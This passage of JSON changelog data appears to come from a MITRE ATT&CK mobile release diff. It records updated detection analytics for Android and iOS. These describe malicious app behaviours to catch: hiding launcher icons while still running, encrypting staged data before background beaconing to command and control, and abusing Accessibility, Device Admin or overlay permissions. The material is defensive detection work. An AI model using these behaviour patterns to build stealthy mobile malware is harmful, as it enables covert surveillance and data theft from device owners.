                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window between visibility suppression and later hidden execution or network activity\"}, {\"field\": \"AllowedAppList\", \"description\": \"Baseline of legitimate apps allowed to hide launcher presence or disable user-facing components\"}, {\"field\": \"ForegroundStateRequired\", \"description\": \"Whether post-hide activity is only suspicious when no foreground interaction occurs\"}, {\"field\": \"HiddenComponentThreshold\", \"description\": \"Threshold for number or type of launcher-visible components disabled before raising suspicion\"}, {\"field\": \"UplinkBytesThreshold\", \"description\": \"Minimum outbound traffic volume used to distinguish meaningful hidden operation from benign background telemetry\"}, {\"field\": \"SensorAfterHideThreshold\", \"description\": \"Threshold for sensor access frequency after visibility suppression\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-13 19:26:01.974000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Correlates (1) changes to application visibility or user-facing presence such as launcher component disablement, icon suppression, or reduced discoverability, (2) continued application execution or privileged framework activity after that visibility reduction, and (3) follow-on behavior such as background network communication, sensor access, or persistence-related state transitions. The defender observes a causal chain where an application becomes less visible to the user while retaining or increasing operational activity.\", \"old_value\": \"Application vetting services could potentially detect the usage of APIs intended for artifact hiding.\\nThe user can examine the list of all installed applications in the device settings. \", \"diff\": \"--- \\n+++ \\n@@ -1,2 +1 @@\\n-Application vetting services could potentially detect the usage of APIs intended for artifact hiding.\\n-The user can examine the list of all installed applications in the device settings. \\n+Correlates (1) changes to application visibility or user-facing presence such as launcher component disablement, icon suppression, or reduced discoverability, (2) continued application execution or privileged framework activity after that visibility reduction, and (3) follow-on behavior such as background network communication, sensor access, or persistence-related state transitions. The defender observes a causal chain where an application becomes less visible to the user while retaining or increasing operational activity.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"managed app inventory or launcher-visible state changes show application remains installed but user-facing entry point or launcher component becomes disabled before later runtime activity\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}, \"iterable_item_removed\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6\", \"name\": \"User Interface\", \"channel\": \"None\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to79__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to79__0\"><a href=\"#difflib_chg_to79__top\">t</a></td><td class=\"diff_header\" id=\"from79_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Application&nbsp;vetting&nbsp;services&nbsp;could&nbsp;potentially&nbsp;detect&nbsp;the&nbsp;us</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to79__top\">t</a></td><td class=\"diff_header\" id=\"to79_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Correlates&nbsp;(1)&nbsp;changes&nbsp;to&nbsp;application&nbsp;visibility&nbsp;or&nbsp;user-fac</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">age&nbsp;of&nbsp;APIs&nbsp;intended&nbsp;for&nbsp;artifact&nbsp;hiding.&nbsp;The&nbsp;user&nbsp;can&nbsp;exami</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ing&nbsp;presence&nbsp;such&nbsp;as&nbsp;launcher&nbsp;component&nbsp;disablement,&nbsp;icon&nbsp;su</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ne&nbsp;the&nbsp;list&nbsp;of&nbsp;all&nbsp;installed&nbsp;applications&nbsp;in&nbsp;the&nbsp;device&nbsp;sett</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ppression,&nbsp;or&nbsp;reduced&nbsp;discoverability,&nbsp;(2)&nbsp;continued&nbsp;applica</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ings.&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">tion&nbsp;execution&nbsp;or&nbsp;privileged&nbsp;framework&nbsp;activity&nbsp;after&nbsp;that&nbsp;v</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">isibility&nbsp;reduction,&nbsp;and&nbsp;(3)&nbsp;follow-on&nbsp;behavior&nbsp;such&nbsp;as&nbsp;back</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ground&nbsp;network&nbsp;communication,&nbsp;sensor&nbsp;access,&nbsp;or&nbsp;persistence-</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">related&nbsp;state&nbsp;transitions.&nbsp;The&nbsp;defender&nbsp;observes&nbsp;a&nbsp;causal&nbsp;ch</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ain&nbsp;where&nbsp;an&nbsp;application&nbsp;becomes&nbsp;less&nbsp;visible&nbsp;to&nbsp;the&nbsp;user&nbsp;wh</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ile&nbsp;retaining&nbsp;or&nbsp;increasing&nbsp;operational&nbsp;activity.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--f3068304-de28-4efa-96a5-a360fc7ffc97",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-01 15:33:34.145000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0641#AN1716",
                            "external_id": "AN1716"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1716",
                    "description": "An application performs explicit cryptographic operations (e.g., symmetric/asymmetric encryption routines) on locally collected or generated data, followed by structured outbound network communication that does not align with expected application behavior, particularly when occurring in the background or without user interaction. Detection correlates crypto API usage + data staging + application state + network transmission patterns.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "App invokes cryptographic functions (e.g., AES/RSA/KeyStore usage) on buffer data followed by encode/transform operations not tied to normal app workflows"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
                            "name": "MobileEDR:telemetry",
                            "channel": "App writes encoded/encrypted blobs (high entropy data) to local storage or memory buffers prior to transmission"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "Crypto + data staging occurs while app_state=background OR device_locked=true OR no recent user interaction"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
                            "channel": "App not in enterprise-approved list performing network + crypto behavior inconsistent with declared functionality"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Time correlation between crypto operation and outbound network transmission"
                        },
                        {
                            "field": "EntropyThreshold",
                            "description": "Threshold for detecting encoded/encrypted payloads based on entropy scoring"
                        },
                        {
                            "field": "AllowedCryptoApps",
                            "description": "Apps expected to perform encryption (e.g., VPNs, messaging apps)"
                        },
                        {
                            "field": "ForegroundStateRequired",
                            "description": "Whether encryption + transmission should only occur during user interaction"
                        },
                        {
                            "field": "BeaconIntervalVariance",
                            "description": "Expected jitter/interval for legitimate app traffic vs beaconing patterns"
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_log_source_references']\": [{\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"App invokes cryptographic functions (e.g., AES/RSA/KeyStore usage) on buffer data followed by encode/transform operations not tied to normal app workflows\"}, {\"x_mitre_data_component_ref\": \"x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"App writes encoded/encrypted blobs (high entropy data) to local storage or memory buffers prior to transmission\"}, {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Crypto + data staging occurs while app_state=background OR device_locked=true OR no recent user interaction\"}, {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"App not in enterprise-approved list performing network + crypto behavior inconsistent with declared functionality\"}], \"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Time correlation between crypto operation and outbound network transmission\"}, {\"field\": \"EntropyThreshold\", \"description\": \"Threshold for detecting encoded/encrypted payloads based on entropy scoring\"}, {\"field\": \"AllowedCryptoApps\", \"description\": \"Apps expected to perform encryption (e.g., VPNs, messaging apps)\"}, {\"field\": \"ForegroundStateRequired\", \"description\": \"Whether encryption + transmission should only occur during user interaction\"}, {\"field\": \"BeaconIntervalVariance\", \"description\": \"Expected jitter/interval for legitimate app traffic vs beaconing patterns\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-01 15:33:34.145000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"An application performs explicit cryptographic operations (e.g., symmetric/asymmetric encryption routines) on locally collected or generated data, followed by structured outbound network communication that does not align with expected application behavior, particularly when occurring in the background or without user interaction. Detection correlates crypto API usage + data staging + application state + network transmission patterns.\", \"old_value\": \"Since data encryption is a common practice in many legitimate applications and uses standard programming language-specific APIs, encrypting data for command and control communication is regarded as undetectable to the user.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to109__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to109__0\"><a href=\"#difflib_chg_to109__top\">t</a></td><td class=\"diff_header\" id=\"from109_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Since&nbsp;data&nbsp;encryption&nbsp;is&nbsp;a&nbsp;common&nbsp;practice&nbsp;in&nbsp;many&nbsp;legitimat</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to109__top\">t</a></td><td class=\"diff_header\" id=\"to109_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">An&nbsp;application&nbsp;performs&nbsp;explicit&nbsp;cryptographic&nbsp;operations&nbsp;(e</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">e&nbsp;applications&nbsp;and&nbsp;uses&nbsp;standard&nbsp;programming&nbsp;language-specif</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">.g.,&nbsp;symmetric/asymmetric&nbsp;encryption&nbsp;routines)&nbsp;on&nbsp;locally&nbsp;co</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ic&nbsp;APIs,&nbsp;encrypting&nbsp;data&nbsp;for&nbsp;command&nbsp;and&nbsp;control&nbsp;communicati</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">llected&nbsp;or&nbsp;generated&nbsp;data,&nbsp;followed&nbsp;by&nbsp;structured&nbsp;outbound&nbsp;n</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">on&nbsp;is&nbsp;regarded&nbsp;as&nbsp;undetectable&nbsp;to&nbsp;the&nbsp;user.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">etwork&nbsp;communication&nbsp;that&nbsp;does&nbsp;not&nbsp;align&nbsp;with&nbsp;expected&nbsp;appli</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">cation&nbsp;behavior,&nbsp;particularly&nbsp;when&nbsp;occurring&nbsp;in&nbsp;the&nbsp;backgrou</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">nd&nbsp;or&nbsp;without&nbsp;user&nbsp;interaction.&nbsp;Detection&nbsp;correlates&nbsp;crypto&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">API&nbsp;usage&nbsp;+&nbsp;data&nbsp;staging&nbsp;+&nbsp;application&nbsp;state&nbsp;+&nbsp;network&nbsp;trans</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">mission&nbsp;patterns.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--369938c8-6b9e-4eb3-8105-eb76a373dc35",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-01 15:39:38.487000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0641#AN1717",
                            "external_id": "AN1717"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1717",
                    "description": "Indirect evidence of application-layer encrypted channel usage inferred through anomalous background processing and network transmission patterns following application activity, where encryption operations are not directly observable. Detection correlates background execution + network behavior + application entitlement posture to identify misuse of encrypted communication channels.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window between background processing and network transmission"
                        },
                        {
                            "field": "AllowedAppList",
                            "description": "Apps expected to use encrypted communication channels"
                        },
                        {
                            "field": "EntropyThreshold",
                            "description": "Threshold for identifying encoded/encrypted payloads"
                        },
                        {
                            "field": "BeaconIntervalVariance",
                            "description": "Tolerance for periodic communication patterns"
                        }
                    ],
                    "x_mitre_platforms": [
                        "iOS"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window between background processing and network transmission\"}, {\"field\": \"AllowedAppList\", \"description\": \"Apps expected to use encrypted communication channels\"}, {\"field\": \"EntropyThreshold\", \"description\": \"Threshold for identifying encoded/encrypted payloads\"}, {\"field\": \"BeaconIntervalVariance\", \"description\": \"Tolerance for periodic communication patterns\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-01 15:39:38.487000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Indirect evidence of application-layer encrypted channel usage inferred through anomalous background processing and network transmission patterns following application activity, where encryption operations are not directly observable. Detection correlates background execution + network behavior + application entitlement posture to identify misuse of encrypted communication channels.\", \"old_value\": \"Since data encryption is a common practice in many legitimate applications and uses standard programming language-specific APIs, encrypting data for command and control communication is regarded as undetectable to the user.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to132__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to132__0\"><a href=\"#difflib_chg_to132__top\">t</a></td><td class=\"diff_header\" id=\"from132_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Since&nbsp;data&nbsp;encryption&nbsp;is&nbsp;a&nbsp;common&nbsp;practice&nbsp;in&nbsp;many&nbsp;legitimat</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to132__top\">t</a></td><td class=\"diff_header\" id=\"to132_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Indirect&nbsp;evidence&nbsp;of&nbsp;application-layer&nbsp;encrypted&nbsp;channel&nbsp;usa</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">e&nbsp;applications&nbsp;and&nbsp;uses&nbsp;standard&nbsp;programming&nbsp;language-specif</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ge&nbsp;inferred&nbsp;through&nbsp;anomalous&nbsp;background&nbsp;processing&nbsp;and&nbsp;netw</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ic&nbsp;APIs,&nbsp;encrypting&nbsp;data&nbsp;for&nbsp;command&nbsp;and&nbsp;control&nbsp;communicati</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ork&nbsp;transmission&nbsp;patterns&nbsp;following&nbsp;application&nbsp;activity,&nbsp;wh</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">on&nbsp;is&nbsp;regarded&nbsp;as&nbsp;undetectable&nbsp;to&nbsp;the&nbsp;user.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ere&nbsp;encryption&nbsp;operations&nbsp;are&nbsp;not&nbsp;directly&nbsp;observable.&nbsp;Detec</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">tion&nbsp;correlates&nbsp;background&nbsp;execution&nbsp;+&nbsp;network&nbsp;behavior&nbsp;+&nbsp;ap</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">plication&nbsp;entitlement&nbsp;posture&nbsp;to&nbsp;identify&nbsp;misuse&nbsp;of&nbsp;encrypte</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">d&nbsp;communication&nbsp;channels.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--31542445-39c5-4ae9-806f-09649581056a",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-13 18:10:00.568000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0642#AN1718",
                            "external_id": "AN1718"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1718",
                    "description": "Correlates (1) application interaction with elevation control mechanisms (e.g., Accessibility Service, Device Admin, overlay permissions, package installer flows), (2) rapid transition to elevated capability state without expected user interaction patterns, and (3) immediate privileged actions such as sensor access, UI manipulation, or background persistence. The defender observes a causal chain where an application gains elevated privileges through abuse of system-controlled consent flows and subsequently performs actions inconsistent with normal user-driven authorization.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
                            "channel": "application granted high-risk permission or special access (AccessibilityService, SYSTEM_ALERT_WINDOW, DeviceAdmin) with abnormal grant pattern (e.g., no recent user interaction or rapid sequence of grants)"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "application invokes privileged framework APIs (Accessibility events, UI automation, package install flows) immediately following permission grant"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Defines correlation window between permission grant and privileged behavior"
                        },
                        {
                            "field": "HighRiskPermissionSet",
                            "description": "List of permissions or access types considered high-risk (Accessibility, Device Admin, overlay)"
                        },
                        {
                            "field": "UserInteractionThreshold",
                            "description": "Defines acceptable proximity of user interaction to permission grant"
                        },
                        {
                            "field": "AllowedAppList",
                            "description": "Baseline of legitimate apps expected to use high-risk permissions"
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Defines correlation window between permission grant and privileged behavior\"}, {\"field\": \"HighRiskPermissionSet\", \"description\": \"List of permissions or access types considered high-risk (Accessibility, Device Admin, overlay)\"}, {\"field\": \"UserInteractionThreshold\", \"description\": \"Defines acceptable proximity of user interaction to permission grant\"}, {\"field\": \"AllowedAppList\", \"description\": \"Baseline of legitimate apps expected to use high-risk permissions\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-13 18:10:00.568000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Correlates (1) application interaction with elevation control mechanisms (e.g., Accessibility Service, Device Admin, overlay permissions, package installer flows), (2) rapid transition to elevated capability state without expected user interaction patterns, and (3) immediate privileged actions such as sensor access, UI manipulation, or background persistence. The defender observes a causal chain where an application gains elevated privileges through abuse of system-controlled consent flows and subsequently performs actions inconsistent with normal user-driven authorization.\", \"old_value\": \"Application vetting services can detect when an application requests administrator permission.\\nWhen an application requests administrator permission, the user is presented with a popup and the option to grant or deny the request. \", \"diff\": \"--- \\n+++ \\n@@ -1,2 +1 @@\\n-Application vetting services can detect when an application requests administrator permission.\\n-When an application requests administrator permission, the user is presented with a popup and the option to grant or deny the request. \\n+Correlates (1) application interaction with elevation control mechanisms (e.g., Accessibility Service, Device Admin, overlay permissions, package installer flows), (2) rapid transition to elevated capability state without expected user interaction patterns, and (3) immediate privileged actions such as sensor access, UI manipulation, or background persistence. The defender observes a causal chain where an application gains elevated privileges through abuse of system-controlled consent flows and subsequently performs actions inconsistent with normal user-driven authorization.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"application granted high-risk permission or special access (AccessibilityService, SYSTEM_ALERT_WINDOW, DeviceAdmin) with abnormal grant pattern (e.g., no recent user interaction or rapid sequence of grants)\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"application invokes privileged framework APIs (Accessibility events, UI automation, package install flows) immediately following permission grant\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--e2f72131-14d1-411f-8e8c-aa3453dd5456\", \"name\": \"User Interface\", \"channel\": \"None\"}}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to183__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to183__0\"><a href=\"#difflib_chg_to183__top\">t</a></td><td class=\"diff_header\" id=\"from183_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Application&nbsp;vetting&nbsp;services&nbsp;can&nbsp;detect&nbsp;when&nbsp;an&nbsp;application&nbsp;</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to183__top\">t</a></td><td class=\"diff_header\" id=\"to183_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Correlates&nbsp;(1)&nbsp;application&nbsp;interaction&nbsp;with&nbsp;elevation&nbsp;contro</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span 